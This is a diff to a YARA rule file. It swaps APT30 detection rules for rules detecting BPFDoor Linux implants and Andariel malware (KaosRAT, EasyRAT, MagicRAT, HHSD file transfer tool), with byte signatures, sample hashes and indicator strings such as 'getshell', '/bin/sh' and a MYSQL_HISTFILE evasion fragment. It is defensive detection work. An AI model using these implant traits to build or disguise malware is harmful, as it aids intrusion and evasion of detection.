-		$s2 = "\\Internet Exp1orer" ascii
+		$x1 = "[-] Execute command failed" ascii fullword
+		$x2 = "/var/run/initd.lock" ascii fullword
+		$xc1 = { 2F 00 3E 3E 00 65 78 69 74 00 72 00 }
+		$sc1 = { 9F CD 30 44 }
+		$sc2 = { 66 27 14 5E }
+		$sa1 = "TLS-CHACHA20-POLY1305-SHA256" ascii fullword
+		$sop1 = { 48 83 c0 01 4c 39 f8 75 ea 4c 89 7c 24 68 48 69 c3 d0 00 00 00 48 8b 5c 24 50 48 8b 54 24 78 48 c7 44 24 38 00 00 00 00 }
+		$sop2 = { 48 89 de f3 a5 89 03 8b 44 24 2c 39 44 24 28 44 89 4b 04 48 89 53 10 0f 95 c0 }
+		$sop3 = { 49 d3 cd 4d 31 cd b1 29 49 89 e9 49 d3 c8 4d 31 c5 4c 03 68 10 48 89 f9 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x457f and filesize < 900KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 4 of them or ( all of ( $sc* ) and $sc1 in ( @sc2 [ 1 ] -50 .. @sc2 [ 1 ] + 50 ) ) ) or ( 2 of ( $x* ) or 5 of them )
 }
-rule SIGNATURE_BASE_APT30_Sample_2 : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_1 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects unknown Linux implants (uploads from KR and MO)"
 		author = "Florian Roth (Nextron Systems)"
-		id = "821a2de9-48c4-58d8-acc4-1e25025ab5cf"
-		date = "2015-04-13"
+		id = "1438c3bf-3c42-59d5-9f3f-2d72bdaaac42"
+		date = "2022-05-05"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L28-L45"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L45-L76"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "0359ffbef6a752ee1a54447b26e272f4a5a35167"
-		logic_hash = "e34dbb90fc868b0619d3d2aa1b6176252836a6ae72e6f52b1eba632054f7c272"
-		score = 75
+		logic_hash = "8de10beea4ef2e059b16d38fb015d6f091cc517b6f0c06b6ef6868518349994d"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
+		hash2 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
+		hash3 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
+		hash4 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
+		hash5 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
+		hash6 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
+		hash7 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
+		hash8 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
+		hash9 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
+		hash10 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
 
 	strings:
-		$s0 = "ForZRLnkWordDlg.EXE" fullword wide
-		$s1 = "ForZRLnkWordDlg Microsoft " fullword wide
-		$s9 = "ForZRLnkWordDlg 1.0 " fullword wide
-		$s11 = "ForZRLnkWordDlg" fullword wide
-		$s12 = " (C) 2011" fullword wide
+		$s1 = "[-] Connect failed." ascii fullword
+		$s2 = "export MYSQL_HISTFILE=" ascii fullword
+		$s3 = "udpcmd" ascii fullword
+		$s4 = "getshell" ascii fullword
+		$op1 = { e8 ?? ff ff ff 80 45 ee 01 0f b6 45 ee 3b 45 d4 7c 04 c6 45 ee 00 80 45 ff 01 80 7d ff 00 }
+		$op2 = { 55 48 89 e5 48 83 ec 30 89 7d ec 48 89 75 e0 89 55 dc 83 7d dc 00 75 0? }
+		$op3 = { e8 a? fe ff ff 0f b6 45 f6 48 03 45 e8 0f b6 10 0f b6 45 f7 48 03 45 e8 0f b6 00 8d 04 02 }
+		$op4 = { c6 80 01 01 00 00 00 48 8b 45 c8 0f b6 90 01 01 00 00 48 8b 45 c8 88 90 00 01 00 00 c6 45 ef 00 0f b6 45 ef 88 45 ee }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x457f and filesize < 80KB and 2 of them or 5 of them
 }
-rule SIGNATURE_BASE_APT30_Sample_3 : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_2 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
 		author = "Florian Roth (Nextron Systems)"
-		id = "62e81385-26f5-545d-92ff-6604ff4d0186"
-		date = "2015-04-13"
+		id = "d5c3d530-ed6f-563e-a3b0-55d4c82e4899"
+		date = "2022-05-07"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L47-L64"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L78-L100"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "d0320144e65c9af0052f8dee0419e8deed91b61b"
-		logic_hash = "ee61ec1fdf27fa21bcc235fce0ab8dc74968b39a747648ce828fb4826cf1d234"
-		score = 75
+		logic_hash = "7525c675dbba6eb480f1d28fc6db05bd9907725c291e64ee6dc2453fd42892a0"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
+		hash2 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
+		hash3 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
+		hash4 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
 
 	strings:
-		$s5 = "Software\\Mic" ascii
-		$s6 = "HHOSTR" ascii
-		$s9 = "ThEugh" fullword ascii
-		$s10 = "Moziea/" ascii
-		$s12 = "%s%s(X-" ascii
+		$opx1 = { 48 83 c0 0c 48 8b 95 e8 fe ff ff 48 83 c2 0c 8b 0a 8b 55 f0 01 ca 89 10 c9 }
+		$opx2 = { 48 01 45 e0 83 45 f4 01 8b 45 f4 3b 45 dc 7c cd c7 45 f4 00 00 00 00 eb 2? 48 8b 05 ?? ?? 20 00 }
+		$op1 = { 48 8d 14 c5 00 00 00 00 48 8b 45 d0 48 01 d0 48 8b 00 48 89 c7 e8 ?? ?? ff ff 48 83 c0 01 48 01 45 e0 }
+		$op2 = { 89 c2 8b 85 fc fe ff ff 01 c2 8b 45 f4 01 d0 2d 7b cf 10 2b 89 45 f4 c1 4d f4 10 }
+		$op3 = { e8 ?? d? ff ff 8b 45 f0 eb 12 8b 85 3c ff ff ff 89 c7 e8 ?? d? ff ff b8 ff ff ff ff c9 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x457f and filesize < 100KB and 2 of ( $opx* ) or 4 of them
 }
-rule SIGNATURE_BASE_APT30_Generic_C : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_May22_3 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects BPFDoor implants used by Chinese actor Red Menshen"
 		author = "Florian Roth (Nextron Systems)"
-		id = "25ec8d54-9875-5bf5-abc9-296f18f3c5e5"
-		date = "2015-04-13"
+		id = "91c2153a-a6e0-529e-852c-61f799838798"
+		date = "2022-05-08"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L66-L88"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L102-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b969565eac3b6f548318aae4edc8d8851f522a6c263bcaf2a466ff0ca9af78a4"
-		score = 75
+		logic_hash = "afec0bfeddf5c5c2abc1a3173f636c385437e5d7c0b68665f6274011113a6a9c"
+		score = 85
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8667f635fe089c5e2c666b3fe22eaf3ff8590a69"
-		hash2 = "0c4fcef3b583d0ffffc2b14b9297d3a4"
-		hash3 = "37aee58655f5859e60ece6b249107b87"
-		hash4 = "4154548e1f8e9e7eb39d48a4cd75bcd1"
-		hash5 = "a2e0203e665976a13cdffb4416917250"
-		hash6 = "b4ae0004094b37a40978ef06f311a75e"
-		hash7 = "e39756bc99ee1b05e5ee92a1cdd5faf4"
+		hash1 = "144526d30ae747982079d5d340d1ff116a7963aba2e3ed589e7ebc297ba0c1b3"
+		hash2 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
 
 	strings:
-		$s0 = "MYUSER32.dll" fullword ascii
-		$s1 = "MYADVAPI32.dll" fullword ascii
-		$s2 = "MYWSOCK32.dll" fullword ascii
-		$s3 = "MYMSVCRT.dll" fullword ascii
+		$s1 = "hald-addon-acpi: listening on acpi kernel interface /proc/acpi/event" ascii fullword
+		$s2 = "/sbin/mingetty /dev" ascii fullword
+		$s3 = "pickup -l -t fifo -u" ascii fullword
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or all of them
 }
-rule SIGNATURE_BASE_APT30_Sample_4 : FILE
+rule SIGNATURE_BASE_APT_MAL_LNX_Redmenshen_Bpfdoor_Controller_Generic_May22_1 : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
+		description = "Detects BPFDoor malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e5c6afde-0ab5-54ed-8d18-5ad477a527d7"
-		date = "2015-04-13"
+		id = "d30df2ae-7008-53c0-9a61-8346a9c9f465"
+		date = "2022-05-09"
 		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L90-L108"
+		reference = "https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/mal_lnx_implant_may22.yar#L121-L156"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "75367d8b506031df5923c2d8d7f1b9f643a123cd"
-		logic_hash = "ec9542acb583bd5812d561bea70e89e0fcddc1eaef14d3ea5b8ad29711ed17ae"
-		score = 75
+		logic_hash = "57ae5f7dc1d202fe66d6626ef2bf2278b92bec0310449ce049bdaeaec5657c77"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "07ecb1f2d9ffbd20a46cd36cd06b022db3cc8e45b1ecab62cd11f9ca7a26ab6d"
+		hash2 = "1925e3cd8a1b0bba0d297830636cdb9ebf002698c8fa71e0063581204f4e8345"
+		hash3 = "4c5cf8f977fc7c368a8e095700a44be36c8332462c0b1e41bff03238b2bf2a2d"
+		hash4 = "591198c234416c6ccbcea6967963ca2ca0f17050be7eed1602198308d9127c78"
+		hash5 = "599ae527f10ddb4625687748b7d3734ee51673b664f2e5d0346e64f85e185683"
+		hash6 = "5b2a079690efb5f4e0944353dd883303ffd6bab4aad1f0c88b49a76ddcb28ee9"
+		hash7 = "5faab159397964e630c4156f8852bcc6ee46df1cdd8be2a8d3f3d8e5980f3bb3"
+		hash8 = "76bf736b25d5c9aaf6a84edd4e615796fffc338a893b49c120c0b4941ce37925"
+		hash9 = "93f4262fce8c6b4f8e239c35a0679fbbbb722141b95a5f2af53a2bcafe4edd1c"
+		hash10 = "96e906128095dead57fdc9ce8688bb889166b67c9a1b8fdb93d7cff7f3836bb9"
+		hash11 = "97a546c7d08ad34dfab74c9c8a96986c54768c592a8dae521ddcf612a84fb8cc"
+		hash12 = "c796fc66b655f6107eacbe78a37f0e8a2926f01fecebd9e68a66f0e261f91276"
+		hash13 = "c80bd1c4a796b4d3944a097e96f384c85687daeedcdcf05cc885c8c9b279b09c"
+		hash14 = "f47de978da1dbfc5e0f195745e3368d3ceef034e964817c66ba01396a1953d72"
+		hash15 = "f8a5e735d6e79eb587954a371515a82a15883cf2eda9d7ddb8938b86e714ea27"
+		hash16 = "fa0defdabd9fd43fe2ef1ec33574ea1af1290bd3d763fdb2bed443f2bd996d73"
+		hash17 = "fd1b20ee5bd429046d3c04e9c675c41e9095bea70e0329bd32d7edd17ebaf68a"
 
 	strings:
-		$s0 = "GetStartupIn" ascii
-		$s1 = "enMutex" ascii
-		$s2 = "tpsvimi" ascii
-		$s3 = "reateProcesy" ascii
-		$s5 = "FreeLibr1y*S" ascii
-		$s6 = "foAModuleHand" ascii
+		$op1 = { c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 ?? 88 45 }
+		$op2 = { 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 }
+		$op3 = { 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 0f b6 80 01 01 00 00 88 45 f? c7 45 f8 00 00 00 00 }
+		$op4 = { 48 89 7d d8 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? }
+		$op5 = { 48 8b 45 ?8 c6 80 01 01 00 00 00 48 8b 45 ?8 0f b6 90 01 01 00 00 48 8b 45 ?8 88 90 00 01 00 00 c6 45 ?? 00 0f b6 45 }
+		$op6 = { 89 75 d4 48 89 55 c8 48 8b 45 c8 48 89 45 ?? 48 8b 45 c8 0f b6 80 00 01 00 00 88 45 f? 48 8b 45 c8 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x457f and filesize < 200KB and 2 of them or 4 of them
 }
-rule SIGNATURE_BASE_APT30_Sample_5 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Scheduledtask_Loader : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "bdbebe44-7423-5793-8a42-4f9b70de2231"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L110-L127"
+		description = "Detects a scheduled task loader used by Andariel"
+		author = "CISA.gov"
+		id = "0c32758b-480c-5784-b28f-cee85d038850"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L3-L18"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "1a2dd2a0555dc746333e7c956c58f7c4cdbabd4b"
-		logic_hash = "3738076d97bf19404bad20c2419eae83dd2b65400d5bd135ffe73362c008de9b"
-		score = 75
+		logic_hash = "2d32ee777cb40c6fa58787e92c0de074ea5b81d629a17ccb4f9432d62436f03c"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "Version 4.7.3001" fullword wide
-		$s1 = "Copyright (c) Microsoft Corporation 2004" fullword wide
-		$s3 = "Microsoft(R) is a registered trademark of Microsoft Corporation in the U" wide
-		$s7 = "msmsgs" fullword wide
-		$s10 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+		$obfuscation1 = { B8 02 00 00 00 48 6B C0 00 B9 CD FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 01 B9 CC FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 02 B9 8D FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 03 B9 9A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 04 B9 8C FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 05 B9 8A FF 00 00 66 89 8C 04 60 01 00 00 B8 02 00 00 00 48 6B C0 06 33 C9 66 89 8C 04 60 01 00 00 }
+		$obfuscation2 = { 48 6B C0 02 C6 44 04 20 BA B8 01 00 00 00 48 6B C0 03 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 04 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 05 C6 44 04 20 8A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 9C B8 01 00 00 00 }
+		$obfuscation3 = { 48 6B C0 00 C6 44 04 20 A8 B8 01 00 00 00 48 6B C0 01 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 02 C6 44 04 20 93 B8 01 00 00 00 48 6B C0 03 C6 44 04 20 96 B8 01 00 00 00 48 6B C0 04 C6 44 04 20 B9 B8 01 00 00 00 48 6B C0 05 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 06 C6 44 04 20 8B B8 01 00 00 00 48 6B C0 07 C6 44 04 20 9E B8 01 00 00 00 48 6B C0 08 C6 44 04 20 9A B8 01 00 00 00 48 6B C0 09 C6 44 04 20 8D B8 01 00 00 00 48 6B C0 0A C6 44 04 20 BC B8 01 00 00 00 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and $obfuscation1 and $obfuscation2 and $obfuscation3
 }
-rule SIGNATURE_BASE_APT30_Sample_6 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Kaosrat_Yamabot
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "2f19809c-09fc-51bf-9a20-6b95099a92dd"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L129-L143"
+		description = "Detects the KaosRAT variant"
+		author = "CISA.gov"
+		id = "cdde69cd-1b38-52f5-8552-cef2cf4ad69c"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L20-L42"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "00e69b059ad6b51b76bc476a115325449d10b4c0"
-		logic_hash = "139719139056f575967629f0153e0a05239bc26f61f6d4324cfb6a816518c3df"
-		score = 75
+		logic_hash = "92182aac2e56041292102b0486b7de1ee6eb3d54a9fc6786c567acd92073cd84"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		tags = ""
 
 	strings:
-		$s0 = "GreateProcessA" fullword ascii
-		$s1 = "Ternel32.dll" fullword ascii
+		$str1 = "/kaos/"
+		$str2 = "Abstand ["
+		$str3 = "] anwenden"
+		$str4 = "cmVjYXB0Y2hh"
+		$str5 = "/bin/sh"
+		$str6 = "utilities.CIpaddress"
+		$str7 = "engine.NewEgg"
+		$str8 = "%s%04x%s%s%s"
+		$str9 = "Y2FwdGNoYV9zZXNzaW9u"
+		$str10 = "utilities.EierKochen"
+		$str11 = "kandidatKaufhaus"
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		3 of them
 }
-rule SIGNATURE_BASE_APT30_Sample_7 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Trifaux_Easyrat_JUPITER : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "612732d9-8df5-5388-b299-2da4f8118435"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L145-L163"
+		description = "Detects a variant of the EasyRAT malware family"
+		author = "CISA.gov"
+		id = "8bd72287-59da-53cf-9015-66149303e59f"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L44-L59"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "868d1f4c106a08bd2e5af4f23139f0e0cd798fba"
-		logic_hash = "f7922d795bc92714a9ef4861bc9c4ac9921a73749e3aa1d5f7dbc3c991fe7145"
-		score = 75
+		logic_hash = "6108035dbebd34fe994fc1f8b4123321321f6ed5c022be6e84a88f905ea6fb73"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "datain" fullword ascii
-		$s3 = "C:\\Prog" ascii
-		$s4 = "$LDDATA$" ascii
-		$s5 = "Maybe a Encrypted Flash" fullword ascii
-		$s6 = "Jean-loup Gailly" ascii
-		$s8 = "deflate 1.1.3 Copyright" ascii
+		$InitOnce = "InitOnceExecuteOnce"
+		$BREAK = { 0D 00 0A 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 2D 00 0D 00 0A }
+		$Bytes = "4C,$00,$00,$00,$01,$14,$02,$00,$00,$00,$00,$00,$C0,$00,$00,$00,$00,$00,$00," wide
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule SIGNATURE_BASE_APT30_Generic_E : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_Cutiedrop_Magicrat : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "69e76a59-3529-541d-9017-07e6d67fbda4"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L165-L183"
+		description = "Detects the MagicRAT variant used by Andariel"
+		author = "CISA.gov (modified by Florian Roth, Nextron Systems)"
+		id = "104244de-83fb-5112-a2b6-e20d38a6ced6"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L61-L85"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5ccf1f1334dc300d13aa8dbc080d2d839815d102958fde2b8709c11f522412fd"
-		score = 75
+		logic_hash = "f289bbd71bdeaf2c42063642454679ec26de5ed24c020af40db694a0ced54884"
+		score = 80
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "1dbb584e19499e26398fb0a7aa2a01b7"
-		hash2 = "572c9cd4388699347c0b2edb7c6f5e25"
-		hash3 = "8ff473bedbcc77df2c49a91167b1abeb"
-		hash4 = "a813eba27b2166620bd75029cc1f04b0"
-		hash5 = "b5546842e08950bc17a438d785b5a019"
 
 	strings:
-		$s0 = "Nkfvtyvn}" ascii
-		$s6 = "----------------g_nAV=%d,hWnd:0x%X,className:%s,Title:%s,(%d,%d,%d,%d),BOOL=%d" fullword ascii
+		$config_os_w = "os/windows" ascii
+		$config_os_l = "os/linux" ascii
+		$config_os_m = "os/mac" ascii
+		$config_comp_msft = "company/microsoft" ascii
+		$config_comp_orcl = "company/oracle" ascii
+		$POST_field_1 = "session=" ascii
+		$POST_field_2 = "type=" ascii
+		$command_misspelled = "renmae" ascii
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5a4d and 7 of them
 }
-rule SIGNATURE_BASE_APT30_Sample_8 : FILE
+rule SIGNATURE_BASE_MAL_APT_NK_Andariel_HHSD_Filetransfertool : FILE
 {
 	meta:
-		description = "FireEye APT30 Report Sample"
-		author = "Florian Roth (Nextron Systems)"
-		id = "5053c2db-32a9-58ae-9a72-eb16ef14168e"
-		date = "2015-04-13"
-		modified = "2023-12-05"
-		reference = "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_apt30_backspace.yar#L185-L201"
+		description = "Detects a variant of the HHSD File Transfer Tool"
+		author = "CISA.gov"
+		id = "46b6dbaf-1272-5bbd-a586-5e48ba6c5022"
+		date = "2024-07-25"
+		modified = "2024-12-12"
+		reference = "https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-207a"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_nk_andariel_jul24.yar#L87-L125"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		hash = "9531e21652143b8b129ab8c023dc05fef2a17cc3"
-		logic_hash = "bff21d517e97d2b13dff2b5ebc9a5b82b8f7635943c89f992b41d269623cd498"
-		score = 75
+		logic_hash = "757fd5e34bcbdf4efdc86a9dff058d92a0479019fbda1d26ad3ee4924b59f0cb"
+		score = 70
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$s0 = "ateProcessA" ascii
-		$s1 = "Ternel32.dllFQ" fullword ascii
-		$s2 = "StartupInfoAModuleHand" fullword ascii
-		$s3 = "OpenMutex" fullword ascii
+		$handshake = { 30 ?? ?? 81 7? ?? 22 C0 78 00 4? 88 }
+		$err_xor_str = { 14 C7 [2] 14 00 41 00 C7 [2] 7A 00 7F 00 C7 [2] 7B 00 63 00 C7 [2] 7A 00 34 00 }
+		$buf_add_cmp_1f = { 4? 02 ?? 4? 02 ?? 3? 1F }
+		$hash_call_loadlib = { B? 8D 10 B7 F8 E8 }
+		$hash_call_unk = { B? 91 B8 F6 88 E8 }
 
 	condition:
-		filesize < 100KB and uint16( 0 ) == 0x5A4D and all of them
